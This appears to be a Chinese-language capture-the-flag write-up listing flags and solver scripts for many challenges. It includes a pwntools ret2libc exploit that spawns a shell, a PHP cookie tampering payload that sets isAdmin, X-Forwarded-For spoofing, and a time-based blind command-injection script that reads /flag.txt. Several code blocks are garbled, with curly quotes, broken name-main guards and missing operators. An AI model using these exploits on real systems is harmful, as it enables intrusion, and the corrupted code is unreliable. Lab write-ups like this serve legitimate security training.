1.RE-sign
直接在rc4-crypt设置断点动调得出flag
Flag为flag{c818b9f06febf0b129a888244be37e16}
2.ez-xor
Flag为flag{HCTFqweASD173}
3. cry_rsa
flag为flag{ 2023326077889096386}
- 被折叠的显影图纸
用010打开文件,搜索flag,可得flag is here flag{GF!1c3_E@$?_kR@Ck3d}
flag{GF!1c3_E@$?_kR@Ck3d}
5. 光隙中的寄生密钥
使用010打开文件,发现flag.txt
解压得到一张图片,使用binwalk解压缩得到flag.txt
发现有密码,使用ARCHPR.exe爆破得到密码9864
得到flag flag{Hidd3n_!@#$%^&*()}
6.gift
莱布尼茨级数(Leibniz series),它收敛于:
π4=1−1/3+1/5−1/7+1/9⋯ —pie
凯撒密码加密,偏移量9,即yrn
Flag为flag{yrn}
- ez_picture
使用Stegsolve.jar打开15.png LSB隐写得到密码999999999
解密文件.zip得到1.jpg
用010打开文件1.jpg
Base64解密得到flag
Flag为flag{HNCTFS3txxnkzRo6}
- easy_misc
str1=[77,49,66,77,83,107,104,68,78,70,81,50,90,50,104,87,98,87,74,76,97,88,66,51,98,50,78,112,81,88,100,89,83,109,82,81,89,107,112,70,83,68,73,61
]
flag=’’
for i in range(len(str1)):
flag+=chr(str1[i])
print(flag)
运行得到M1BMSkhDNFQ2Z2hWbWJLaXB3b2NpQXdYSmRQYkpFSDI=
Base64解密得到synt{UAPGSWeBTdU4vnxvL}
得到flag为flag{HNCTFJrOGqH4iakiY}
9.套娃
不停的解压缩将文件后缀.xlsx改为.zip解压缩得到txt文件将文件后缀改为.zip解压缩后发现不对,将文件后缀改为.docx可见
Flag为flag{HNCTFeHbe7vFWi}
10. ez_pwn
上午打的了忘记截图了
import time
from time import time
from pwn import *
import ctypes
import concurrent.futures
from ctypes import CDLL, c_intcontext(arch = ‘amd64’,os = ‘linux’,log_level = ‘debug’)
#libc =ELF(‘libc-2.31.so’)
libc = ELF(‘/lib/x86_64-linux-gnu/libc.so.6’)
p = process(‘./pwn’)
#p =remote()
elf = ELF(‘./pwn’)
rdi = 0x004012c3
ret = 0x040101a
rsi_ = 0x04012c1
def bug():
gdb.attach(p)
payload = b’a’*(0x20+0x8)+p64(rsi_)+p64(elf.got[‘write’])2+p64(rdi)+p64(2)+p64(elf.plt[‘write’])+p64(elf.sym[‘main’])
#bug()
p.sendline(payload)
libc_base = u64(p.recvuntil(‘\x7f’)[-6:].ljust(8, b’\x00’))-libc.sym[‘write’]
log.success(hex(libc_base))
system=libc_base+libc.sym[‘system’]
binsh = libc_base + next(libc.search(b’/bin/sh’))
payload = b’b’(0x20+0x8)+p64(rdi)+p64(binsh)+p64(system)
p.sendline(payload)
p.sendline(b’cat flag’)
p.interactive()
得到flag
Flag为flag{a51a3bdf23919f677efccd90270da72f}
11. baby_rsa
脚本:
from Crypto.Util.number import long_to_bytes
from gmpy2 import isqrt, invert, powmod
N =12194420073815392880989031611545296854145241675320130314821394843436947373331080911787176737202940676809674543138807024739454432089096794532016797246441325729856528664071322968428804098069997196490382286126389331179054971927655320978298979794245379000336635795490242027519669217784433367021578247340154647762800402140321022659272383087544476178802025951768015423972182045405466448431557625201012332239774962902750073900383993300146193300485117217319794356652729502100167668439007925004769118070105324664379141623816256895933959211381114172778535296409639317535751005960540737044457986793503218555306862743329296169569
e = 65537
c =4504811333111877209539001665516391567038109992884271089537302226304395434343112574404626060854962818378560852067621253927330725244984869198505556722509058098660083054715146670767687120587049288861063202617507262871279819211231233198070574538845161629806932541832207041112786336441975087351873537350203469642198999219863581040927505152110051313011073115724502567261524181865883874517555848163026240201856207626237859665607255740790404039098444452158216907752375078054615802613066229766343714317550472079224694798552886759103668349270682843916307652213810947814618810706997339302734827571635179684652559512873381672063
def factor_n_adjacent_primes(N):
root = isqrt(N)
for i in range(1000):
p_candidate = root + i
if N % p_candidate == 0:
return p_candidate, N // p_candidate
p_candidate = root - i
if p_candidate > 0 and N % p_candidate == 0:
return p_candidate, N // p_candidate
return None, None
p, q = factor_n_adjacent_primes(N)
if p is None or q is None:
print(“无法分解N”)
else:
print(f”已分解N: p = {p}, q = {q}”)
phi = (p - 1) * (q - 1)
d = invert(e, phi)
m = powmod(c, d, N)
flag = long_to_bytes(m)
print(f”解密后的flag: {flag.decode(‘ascii’, errors=’ignore’).strip()}”)
解得flag为flag{5c9c885c361541e0b261f58b61db8cec},再将其中的9改为0
Flag为flag{5c0c885c361541e0b261f58b61db8cec}
12. 草甸方阵的密语
Flag为flag{Thatsright}
13. easy-签到题
Base64 -> Base32 -> Base16
flag为flag{4e79a218-5b3d-7c81-2f06-39148e5d67b0}
14. YWB_Web_xff
题目源码 提供了一个网页(index),检查 cip 的值是否为 2.2.2.1,如果是,就返回 flag。
cip 的值来自 HTTP 请求头 X-Forwarded-For(通常用于代理服务器传递客户端真实 IP)。
目标:伪造 X-Forwarded-For: 2.2.2.1,让服务器认为 cip=2.2.2.1,从而获取 flag。
Flag为:flag{9u60w1kemajt}
15. YWB_Web_未授权访问
2.这道题的回显来看,响应头中的Set - Cookie字段值得重点关注,它表明当前用户身份是guest且isAdmin为false。所以修改cookie字段令isAdmin=true(将b%3A0%3B改为b%3A1%3B)。
3.利用hackbar修改:user=O%3A5%3A%22Admin%22%3A2%3A%7Bs%3A4%3A%22name%22%3Bs%3A5%3A%22guest%22%3Bs%3A7%3A%22isAdmin%22%3Bb%3A1%3B%7D
4.拿到flag。
16.easyweb
import requests
def get_flag(addr, result=””):
for x in range(39):
for i in range(0x1f, 0x7f):
if dev(addr, x, chr(i)):
result += chr(i)
print(result)
def dev(addr, pos, payload):
data = {
“cmd”: “[ cut -c %d /flag.txt = ‘%s’ ] && sleep 2” % (pos, payload)
}
try:
requests.dev(“http://%s/“ % addr, data, timeout=(5, 1))
except requests.exceptions.ReadTimeout:
return True
return False
if name == ‘main‘:
get_flag(“47.105.113.86:40005”)
flag为flag{d4ek6s7kzztx}
17.YWB_Web
18. ez_math
反编译的到
def xor_decrypt(input_file, output_file, key):
with open(input_file, ‘rb’) as f:
encrypted_data = f.read()
decrypted_data = bytes([
byte ^ ord(key[i % len(key)]) for i, byte in enumerate(encrypted_data)
])
with open(output_file, ‘wb’) as f:
f.write(decrypted_data)
if name == ‘main‘:
input_file = ‘eqEnc7’
output_file = ‘eq_decoded’
key = ‘eq verySimple’
xor_decrypt(input_file, output_file, key)
得到
from z3 import *
import time
import re
def optimized_solver():
ctx = Context()
solver = Solver(ctx=ctx)
# 创建变量字典(兼容两种格式)
x = {i: BitVec(f'x_{i}', 32, ctx=ctx) for i in range(38)}
# 自动转换函数(核心修改)
def convert_eq(line):
# 将 x[数字] 转换为 x_数字
converted = re.sub(r'x\[(\d+)\]', r'x_\1', line)
# 验证转换结果
if 'x[' in converted:
raise ValueError(f"格式转换失败: {line.strip()}")
return converted
# 加载并转换方程
eq_path = r"D:\题题\御网杯\enc7\eq_decoded.txt"
equations = []
with open(eq_path, 'r') as f:
for line_num, line in enumerate(f, 1):
try:
# 自动转换格式
converted_line = convert_eq(line.strip())
# 创建符号表
symbols = {f'x_{i}': x[i] for i in range(38)}
eq = eval(converted_line, {}, symbols)
equations.append(eq)
except Exception as e:
print(f"错误位于第 {line_num} 行: {line.strip()}")
raise
# 添加约束
constraints = [
And(x[i] >= 32, x[i] <= 126) for i in range(38)
]
constraints += [
x[0] == ord('f'),
x[1] == ord('l'),
x[2] == ord('a'),
x[3] == ord('g'),
x[4] == ord('{'),
x[37] == ord('}')
]
solver.add(constraints + equations)
# 求解
start_time = time.time()
if solver.check() == sat:
model = solver.model()
flag = bytes([model.eval(x[i]).as_long() for i in range(38)])
print(f"求解耗时: {time.time() - start_time:.2f}s")
print("Flag:", flag.decode())
else:
print("无解")
if name == “main“:
optimized_solver()
解密得到flag为flag{815ddbd7a20d03a9cea4dd6ef8685c74}